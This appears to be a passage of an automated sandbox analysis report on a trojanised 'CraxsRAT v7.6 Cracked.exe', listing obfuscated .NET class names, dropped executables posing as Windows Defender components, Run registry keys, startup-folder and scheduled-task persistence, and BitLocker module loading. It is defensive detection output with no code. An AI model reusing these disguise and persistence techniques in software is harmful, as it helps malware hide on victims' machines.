Source: Windows Defender Notification.exe.10.dr, dRbRSlfClq9FzBPNcL355veDxzfFx2QIWnrggUkAAxxka4xjh2nGbpV0jwsb2c174JFuYrelADjFIWxDIRp.cs	High entropy of concatenated method names: 'IRSmar0xXVR4UsJJOtVS3Nufgkl4S9oBQtSlQH2llsuNCYdPsN5Rk9ChpbTyFZGNq5uopS7ie3AiC5oY55l', 't9AfThoo7nMHFnR9tltANM4dKWhNxOFrL231jEj9z6Trma7K4h320tNpSHOe8Y70vyPC3pw0TbCNnAdljZW', 'CSllT1stUEH8bCYwTOBEwClyf7OOxkSgbTEtsLpHvmyVbY3ESy4rplbw3Z3W6paDw9t1CII3RKFCVzaJlFp', 'fxDsWtErS2WPg9n04qvh2tkGp5o9ZPC4LtwgUo8Nx5znyg5JwzergO4eNjY1QuMXk9gysfB8Me5aMrRbE1E', 'lxYGtK7oKCgdMuJmmsvdXi3aI7cKBLPXJDHVvdHji3xNJNO3ctjnlzlIO5mqtfA2SVgdhXHbUA8Zx5U4gy9', '_4mZ9QyfPaIZknqStmooj0ZSdf7sqTfpmY2TmJkgDzPSpIanAMc7kid8oT863AMhRyDiDWAonKFLPYmL5UZ8GMR', 'TOCbSj7ueBUbtKWNp97R2YAquZTw8vdKD92eb4ptZNTfXALR3pzZ1tVAdr07IOWudqqBtNrTVtTJYpjn2NvTFq', '_128ooaK8Ay1av0suWHrIubhLdQHfmfm2NQgKwnBT3JPSgSAMik3d1Ka1t9V7BJIRmuCRrg07F5x0nBgNmFMtH8', 'LEBTuCdV6B8HkfMEyGZut5l1TVxGjzdRGSvae4nNbbekcXYtgZBgy7kaTmHOBcMe4UD5y0QL2pY7tjCGdQV3vB', 'jKjZnQSJjkvPqSU17baZXt8aTfM2x0so13eMeCTUukFoo0vGrAszbeXi75jNPk2ckzKPRdK3VDYgoodu89tZgw'
Source: Windows Defender Notification.exe.10.dr, 8H0hdeBXNmvFjH8LejVEK2sRsxtRvHpaEUv4gz0XOQuxjnFHEDOH5YGig1PH9L3jiaNH.cs	High entropy of concatenated method names: 'rGbeiPz0OChV2j5nw5PShma3VuRlCxGb5FUWgGSDAED34Cnduq5uxHtnfG7MtQgPTkVD', 'eqKQ6MVA5zxAyBxgYUz4wX3Pmlry', 'RAiYehoOKsoox4y4R6OC7Ldrw6UP', '_3s78StkDqmLED63R5qLD8vyz4Gil', 'wgHLuou176s3KG7W43NoDROZVCuN'
Source: Windows Defender Notification.exe.10.dr, uUAcd1V7wC.cs	High entropy of concatenated method names: '_2S8IlRDS09', 'pjqDgiSIDQ', 'WfS6mBpWvh', 'EzwAFhJ8Xy', 'uYJ5UByWqFyVV21VK9xlXftX1LCG', 'bVQ9TJkJuS68ADrYqkdW8orrqzgw', 'jldwlwr4duUoiBr5eJ0penUR6YwT', 'V3PW2WaGywFVERzBd0R6lLTfyb8r', 'y9N3yYM2HxQHXXmdBQ2Q9hZcyM89', 'NjWV4Tw0G6mVriKH3MkCEE3tdjNQ'
Source: Windows Defender Notification.exe.10.dr, EOyKcrIIRLTNubYgGKGgKjoqSr7c9zgDf9aJO6MsxDbA40nsOqbxOGqvaZqHVnECdg6J.cs	High entropy of concatenated method names: 'QMjwo3fILt4Q57oj4NTw0P4SrbNbIHsIDgwj5dJtmPpESYUsYvEwJ2dRK17AkQbHCEVR', 'PpWeAhKjSMaQHUtRxDJVvAkF9h5mZ0YxdJFxrvDnISXeQBYC0VSy3k10dnulrx4YrJL5', 'BkaWvTqOE5rv82tgze7NxQH2zcOGJB97UP2IniM0qLQxlB0re0SRdvhyGNX5RN2psBmV', 'qHL7QOmO7t3NVCCeg5I4k9GCJLiE', 'V6Q8jmcV0FYtDLRT14GgIJlknAOa', '_07HyQio1gYbc7kb4xMi0k442gudD', 'UufWd0OTWOQr9C6W228RwNFDRP3O', 'yyn46w0tdaVwZTGbWYKko0yTYvXo', 'qgZIiJUJDm1oQZVvQcJxCFCd0gFN', 'dQOYj5uew6SbhhatlWBijmPdHns0'
Source: Windows Defender Notification.exe.10.dr, wBRYVJsNSz.cs	High entropy of concatenated method names: '_872Ltu2fCH', 'jspSovylUO', 'adTPT0XeTE', 'TsZ6V52swD', 'pmpkki2lR0', 'CVKDY4oC8S', '_2yis8zC1eF', 'O6UriEAM1c', 'ondwqrYknc', 'ZPwkdtio2V'
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	High entropy of concatenated method names: 'hUTBZw0qQPPA85lrNna3ABameXhl8syhGD8CU9jKH2Kj2GcvLzxa8rERIkKay2xJ9Lhg', '_7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7', 'gcpIaJkjqYqCYihU09Ucj7eNVBxWPffEBpOCsIQeUY8IrvJfF8XAlA3yjt0Ej39iZGB2', '_96GnE5mKeCIDgVHH0TDChsZEdCmkXbMraCTU5AbAh1JlyB6dG4P8iNZtru6cdOuRY1Yj', 'IBe4xDCbPzxJjFNgC9J3xAlYFtWFjUXCJ35kg3zQ7ExGd2Z4HJN9goUWwjdhDPuU5KuM', '_91MeKo2qrjO69nzi9SiholxBL6H8iERcGUCL4K3x7FzIgvAuRjqtDl2fPMNq7vsHnTPY', 'mqyxUBTCVTLNILmtNSjzTi0o0uXveTYhYyuLzAlquZ1ey5mfDxkZuHAOuBiefWAhHXfp', 'E5pnqmBot5jiUR2C6qRun2DcQbIg0kP10RuVVPQ3Y0zzNxiAb8lTSczshlYrpf2nUyBO', 'qpWJmHdxvnEKdXyNbgBE2UsCFVnvttdlD9nNXE5BfhYjhhGG5o71sR5QMET9AvGk3de7', 's1zCMCUOduVNKa0bhH2aJtyqAjUjeNtROWW07XVgR9NsEK0DVs0KJSXX64qCygdAsmh9'
Source: Windows Defender Notification.exe.10.dr, qOI2DzwDff.cs	High entropy of concatenated method names: 'C31WpCvMpd', 'ba8D85QmvDQVnyRzi3WLMmAfQ3z2', 'DPziFgzS4RcvDcs1UFyp7kEhA6sv', 'QQMAzcWbgNDxyrNwAeSIqlXSgaQG', 'ZkG9efTMmlw9Oo9Jqj6tvYJvGs2r'

Drops PE files

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File created: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	File created: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Jump to dropped file
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File created: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe	Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0e75fed00639ea9e725255499292dcdd

Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0e75fed00639ea9e725255499292dcdd			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Defender Notification			Jump to behavior

Drops PE files to the startup folder

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender Notification.lnk			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0e75fed00639ea9e725255499292dcdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0e75fed00639ea9e725255499292dcdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run 0e75fed00639ea9e725255499292dcdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run 0e75fed00639ea9e725255499292dcdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Defender Notification	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Defender Notification	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
